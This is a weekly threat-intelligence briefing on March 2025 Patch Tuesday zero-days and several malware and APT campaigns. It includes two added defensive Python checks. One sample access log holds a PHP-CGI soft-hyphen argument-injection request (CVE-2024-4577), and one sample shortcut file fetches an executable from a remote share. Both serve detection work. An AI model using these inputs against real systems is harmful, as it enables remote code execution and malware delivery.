Cyber Security Weekly Briefing, 8 - 14 March
Microsoft fixes 57 bugs, 7 of them zero-days, in Patch Tuesday
Microsoft has released its March 2025 Patch Tuesday update, fixing 57 security flaws, including six actively exploited zero-day vulnerabilities and one additional publicly disclosed zero-day. Of the 57, 23 are remote code execution (RCE) vulnerabilities, six of them rated critical.
The actively exploited zero-days are CVE-2025-24983, a Windows Win32 Kernel Subsystem elevation-of-privilege flaw that lets a local attacker gain SYSTEM privileges on the device; CVE-2025-24984 and CVE-2025-24991, both Windows NTFS information disclosure flaws; CVE-2025-24985, an RCE flaw in the Windows Fast FAT file system driver; CVE-2025-24993, another RCE flaw, this one in Windows NTFS; and CVE-2025-26633, a security feature bypass in Microsoft Management Console.
The publicly disclosed zero-day is CVE-2025-26630, a remote code execution vulnerability in Microsoft Access.
SideWinder intensifies its attacks on maritime and nuclear infrastructures
The APT group SideWinder has expanded its attacks to strategic sectors such as maritime and energy infrastructure, with a growing interest in the nuclear industry in South Asia.
According to a report published by Securelist (Kaspersky), throughout 2024 its operations spread to new regions, including Egypt and several African countries. The detected campaign relies on phishing emails carrying malicious documents that exploit CVE-2017-11882 (CVSSv3 7.8), the long-patched Microsoft Office Equation Editor memory-corruption flaw, to deploy the Backdoor Loader malware and the StealerBot espionage implant.
SideWinder is notorious for constantly updating its arsenal to evade detection, modifying its code within hours of its tools being flagged. The most affected entities include governments, ministries, and logistics and telecommunications companies.
Strela Stealer targets email clients in Europe
Trustwave has identified a new campaign by Strela Stealer, an infostealer active since 2022 that steals email credentials from systems running Mozilla Thunderbird and Microsoft Outlook. The malware has been distributed via phishing campaigns in European countries such as Spain, Germany, Italy and Ukraine.
Recently, the attackers have started re-sending legitimate emails with fake invoices that carry a ZIP file containing the malware loader. According to the researchers, Strela Stealer is operated by the Hive0145 group and uses Russian hosting infrastructure to evade detection.
Its code is heavily obfuscated and employs techniques such as fiber manipulation and checks of the system environment to hinder analysis.
Critical PHP-CGI vulnerability now exploited worldwide
Vulnerability CVE-2024-4577 (CVSSv3 9.8, according to the PHP Group), which affects web servers running PHP in CGI mode on Windows and was initially exploited in attacks against Japanese organizations, now poses a global threat, researchers have warned.
Cisco Talos and GreyNoise have observed exploitation attempts in several regions, including the U.S., Singapore, Japan, the U.K. and Spain, underlining the need for immediate action. The flaw affects servers running PHP in CGI mode and has been used to steal credentials and establish persistence on compromised systems.
Although a patch was released in mid-2024, GreyNoise has identified 79 distinct exploits for the vulnerability that allow remote code execution on a vulnerable system, suggesting an expanding attack pattern.
Symantec also reported its use in August 2024 against a Taiwanese university.
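As an added example (not from the page, Talos or GreyNoise), the following Python snippet is a detection check for the CVE-2024-4577 request pattern in Apache-style access logs. It assumes the publicly documented mechanism of the flaw: on Windows, with certain code pages, PHP-CGI "best-fit" maps the percent-encoded soft hyphen (%AD) to an ordinary hyphen, so a query string such as `%ADd+allow_url_include%3d1` reaches php-cgi as the command-line option `-d allow_url_include=1`. The log lines below are constructed for the example; the 203.0.113.0/24 addresses are a documentation range.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log style lines for the example; not from a real incident.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2025:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
203.0.113.11 - - [10/Mar/2025:12:00:02 +0000] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 77
203.0.113.12 - - [10/Mar/2025:12:00:03 +0000] "GET /test.php?%adD+cgi.force_redirect%3d0 HTTP/1.1" 200 12
203.0.113.13 - - [10/Mar/2025:12:00:04 +0000] "GET /search.php?q=hello-world&x=%ad HTTP/1.1" 200 900
"""

# The request line inside an access-log record.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Percent-encoded soft hyphen (0xAD) at the start of the query string or right
# after a '+'/'%20' separator, followed by a php-cgi option letter (e.g. 'd').
# A bare '%ad' inside an ordinary parameter value does not match.
SOFT_HYPHEN_OPTION_RE = re.compile(r"(?:^|\+|%20)%ad[a-z]", re.IGNORECASE)


def flag_cve_2024_4577(log_text):
    """Return (client_ip, decoded_query) for each request whose query string
    looks like a soft-hyphen php-cgi argument injection."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        if "?" not in target:
            continue
        query = target.split("?", 1)[1]
        if SOFT_HYPHEN_OPTION_RE.search(query):
            client_ip = line.split(" ", 1)[0]
            # latin-1 keeps 0xAD as U+00AD so the soft hyphen stays visible in output.
            hits.append((client_ip, unquote_plus(query, encoding="latin-1")))
    return hits


if __name__ == "__main__":
    for ip, decoded in flag_cve_2024_4577(SAMPLE_LOG):
        print(f"{ip}: {decoded!r}")
```

The check only has meaning for PHP-CGI on Windows hosts; on Linux the soft hyphen is not remapped, so matches there are noise rather than exploitation. Treat a hit as a trigger for checking whether `auto_prepend_file` or `allow_url_include` were accepted, not as proof of compromise.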
Blind Eagle campaign against the Colombian government
Blind Eagle, an APT group active since 2018, has been targeting government institutions, the judicial sector, critical infrastructure and private organizations in Colombia.
According to Check Point Research, the group used a variant of the exploit for CVE-2024-43451 to compromise more than 1,600 victims in a single campaign in late 2024. Blind Eagle, which has also been observed attacking other Latin American countries, relies on sophisticated social engineering to gain access to targeted systems.
Its recent attacks have used .url (Internet Shortcut) files that, when interacted with, trigger the download and execution of malware, including remote access Trojans such as NjRAT, AsyncRAT and Remcos.
Abusing legitimate file-sharing platforms such as Google Drive and Dropbox has allowed the group to evade traditional security controls. Although Microsoft released a patch for CVE-2024-43451, Blind Eagle adapted quickly, introducing a variant of the exploit within six days.
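As an added example (not from the page or Check Point's report), the Python check below triages Internet Shortcut (.url) files of the kind described above: files whose URL= target is a remote file:// or UNC share, or whose IconFile= is fetched from a remote host. That is the general shape reported for .url lures that abuse CVE-2024-43451; the exact fields Blind Eagle's files used are an assumption here, and the two shortcut bodies are constructed for the example (203.0.113.50 is a documentation address, not a real server).

```python
from urllib.parse import urlparse

# Constructed Internet Shortcut contents for the example (not real samples).
BENIGN_URL_FILE = """\
[InternetShortcut]
URL=https://www.example.com/
"""

SUSPICIOUS_URL_FILE = """\
[InternetShortcut]
URL=file://203.0.113.50@80/share/invoice.exe
IconIndex=0
IconFile=\\\\203.0.113.50@80\\share\\icon.ico
"""


def parse_url_file(text):
    """Minimal parser for the INI-style .url format; returns lowercase-keyed fields
    from the [InternetShortcut] section. configparser is avoided on purpose: '%'
    in URLs would trigger its value interpolation."""
    fields = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def remote_host(value):
    """Host a URL= or IconFile= value points at, or None if it is local/empty."""
    if value.startswith("\\\\"):  # UNC path: \\host\share\...
        host = value[2:].split("\\", 1)[0]
        return host or None
    parsed = urlparse(value)
    if parsed.scheme in ("file", "http", "https") and parsed.netloc:
        return parsed.netloc  # keeps 'host@port' WebDAV-style authority intact
    return None


def assess_url_file(text):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    fields = parse_url_file(text)
    findings = []
    url = fields.get("url", "")
    # An https:// URL is what a normal shortcut carries; a file:// or UNC target
    # makes Explorer reach out to a remote share on minimal interaction.
    if url.startswith("\\\\") or urlparse(url).scheme == "file":
        host = remote_host(url)
        if host:
            findings.append(f"URL target is a remote file share on {host}")
    icon_host = remote_host(fields.get("iconfile", ""))
    if icon_host:
        findings.append(f"IconFile is fetched from remote host {icon_host}")
    return findings


if __name__ == "__main__":
    for name, body in (("benign", BENIGN_URL_FILE), ("suspicious", SUSPICIOUS_URL_FILE)):
        print(name, assess_url_file(body) or ["no findings"])
```

Run it over .url attachments extracted from mail or from download folders; a remote IconFile is worth flagging even when the URL= target looks harmless, because the icon is fetched without the user opening the shortcut.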
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in the rest of the Operational and Strategic Intelligence content included in the service, please contact us.